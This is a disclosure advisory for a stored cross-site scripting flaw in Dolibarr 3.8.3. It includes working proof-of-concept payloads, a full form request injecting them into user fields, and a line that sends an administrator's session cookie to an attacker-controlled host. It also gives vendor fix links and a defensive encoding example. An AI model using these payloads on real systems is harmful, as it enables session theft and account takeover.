
Dolibarr 3.8.3 Cross Site Scripting

Posted Jan 11, 2016
Authored by Mickael Dorigny | Site synetis.com

Dolibarr version 3.8.3 suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
MD5 | 06f1e26e3401e69cf528a8443feafb0e

######################################################################
# Exploit Title: XSS on dolibarr 3.8.3
# Date: 03/01/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: http://www.dolibarr.org/
# Category: XSS
######################################################################

Dolibarr description :
======================================================================
Dolibarr ERP & CRM is a modern and easy to use web application to manage your business (contacts, invoices, orders, products, stocks, agenda, emailings, etc.).

It is open source, free software designed for small companies, foundations and freelancers.
You can install and use it as a standalone application, or online on a shared or dedicated server to use it from anywhere. Dolibarr is also available on ready to use Cloud services.

Vulnerability description :
======================================================================
A stored XSS vulnerability exists in the Dolibarr 3.8.3 core code. No module needs to be activated to exploit it, because an attacker can use the user attribute management feature to do so.

This XSS can be exploited through a basic user account on the Dolibarr installation. Impacted users are administrators and any users who have the right to view other users' attributes.

PoC n°1 : Stored XSS in user attributes:
======================================================================
Once a regular user is logged in with his account, he can modify his attributes such as last name, first name, mobile number, etc. This information can be reviewed by other users who have administration privileges.

Note that some basic protection is applied right after the form is submitted. This protection does not allow an attacker to use basic JavaScript tricks such as "<script>" tags or the "onerror" JavaScript event handler, but some other event handlers are still allowed.

Using the <IMG> HTML tag and the "onmouseover" JavaScript event, we can make an admin trigger the payload simply by passing his mouse over the injected image. This event can be used to execute arbitrary JavaScript instructions in the administrator's browser, or in the browser of any other user allowed to view users' attributes.

PoC :
As an authenticated user, fill the "Last name", "First name", "email", "job" or "signature" input with this:
user1<img src=x onmouseover=alert(1)>

[REQUEST]
http://server/dolibarr/htdocs/user/card.php?id=2
[POSTDATA]
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="token"
3e01b40f4659396870a384c16213e400
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="action"
update
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="entity"
1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="lastname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="firstname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="job"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="gender"
man
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="login"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="password"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="admin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="superadmin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_phone"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="user_mobile"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_fax"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="email"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="signature"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="fk_user"
-1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="weeklyhours"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="save"
Save
-----------------------------7677991721297181448923571907--

Note that the "First name" and "Last name" inputs are displayed on the "List of users" page, but they are truncated after 50 characters. This truncation limits the available XSS payloads. We can use the "signature" input to insert more JavaScript instructions through the same HTML form. Admins will then see this signature when they click on a user in the "List of users" page to see all his attributes.

The image insertion can target an existing or a non-existent image. A small tip to increase the chance of trapping an admin is to upload a very big image (such as 1920*1080) that covers the whole page.

Once the attributes are modified, another user such as an admin can check them and will then execute the JavaScript instructions by passing his mouse over the injected image. Here is another PoC that sends the admin's cookie to a website controlled by the attacker using an HTTP GET request. Inject this payload in the "signature" input:
<img src=x onmouseover=document.location="http://hackerserver?c="+document.cookie+"">

Using this vulnerability, an attacker could tamper with page rendering, redirect the victim to a fake login page, or capture user credentials such as session cookies.


Screenshots :
======================================================================
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-03.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-04.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-05.jpg

Solution:
======================================================================

The fix for this vulnerability is available in the Dolibarr GitHub repository: https://github.com/Dolibarr/dolibarr/issues/4341 / https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56
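The advisory makes two points a defender should take away: a denylist that strips "<script>" and "onerror" still lets every other event handler through, and the durable fix for attributes rendered into HTML is contextual output encoding at display time. The following Python script is an added example written for this page; it is not Dolibarr's code and it does not reproduce the referenced commit. The denylist filter is a hypothetical model of the behaviour described above, and the payload is the one submitted in the PoC form. It shows that the payload survives the denylist intact and would be parsed as an <img> with an onmouseover handler, while the HTML-encoded form contains no element at all. It also illustrates the truncation detail from the "List of users" page: truncate the raw value first, then encode, so an entity is never cut in half.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample: the payload the advisory submits in the user card form.
PAYLOAD = 'user1<img src=x onmouseover=alert(1)>'

# Hypothetical denylist filter modelled on the behaviour the advisory
# describes (blocks "<script" and "onerror=" only). It is NOT Dolibarr's
# code; it exists to show that a denylist leaves other handlers intact.
_DENY = re.compile(r'<\s*/?\s*script|onerror\s*=', re.IGNORECASE)


def denylist_filter(value: str) -> str:
    """Remove denylisted fragments and store the remainder verbatim."""
    return _DENY.sub('', value)


def encode_for_html_text(value: str) -> str:
    """Contextual output encoding for an HTML text node.

    Every '<', '>', '&', '"' and "'" becomes an entity, so the browser can
    never start an element or an attribute from user-controlled data.
    """
    return html.escape(value, quote=True)


def render_truncated(value: str, limit: int = 50) -> str:
    """Render a list-page cell: truncate the RAW value, then encode.

    Truncating after encoding could split an entity such as '&lt;' and emit
    a dangling '&'; truncating first keeps the output well-formed.
    """
    return encode_for_html_text(value[:limit])


class _ActiveContentScanner(HTMLParser):
    """Collects every element and every on* event-handler attribute parsed."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, _value in attrs:
            if name.lower().startswith('on'):
                self.handlers.append(f'{tag}@{name.lower()}')


def active_content(fragment: str) -> dict:
    """Parse a fragment the way a browser would and report what it activates."""
    scanner = _ActiveContentScanner()
    scanner.feed(fragment)
    scanner.close()
    return {'tags': scanner.tags, 'handlers': scanner.handlers}


if __name__ == '__main__':
    stored = denylist_filter(PAYLOAD)
    print('denylist kept  :', stored, active_content(stored))
    safe = encode_for_html_text(PAYLOAD)
    print('encoded output :', safe, active_content(safe))
    print('truncated cell :', render_truncated(PAYLOAD))
```

The scanner is only a checking aid: it reuses the standard library's HTML tokenizer to show what a browser would instantiate from each string, which is a more honest test than grepping for "<script>". Encoding is applied at the output boundary rather than at form submission, so the same stored value is safe wherever it is later rendered.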

Additional resources :
======================================================================
- https://www.youtube.com/watch?v=p2rFWJOCJC8
- http://www.information-security.fr/en/xss-dolibarr-version-3-8-3/
- https://github.com/Dolibarr/dolibarr/issues/4341
- https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56


Report timeline :
======================================================================
2016-01-03 : Vendor informed of the vulnerability
2016-01-07 : Vulnerability fixed
2016-01-11 : Advisory published

Credits :
======================================================================

[Synetis ASCII logo]
www.synetis.com
Consulting firm in management and information security

Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr
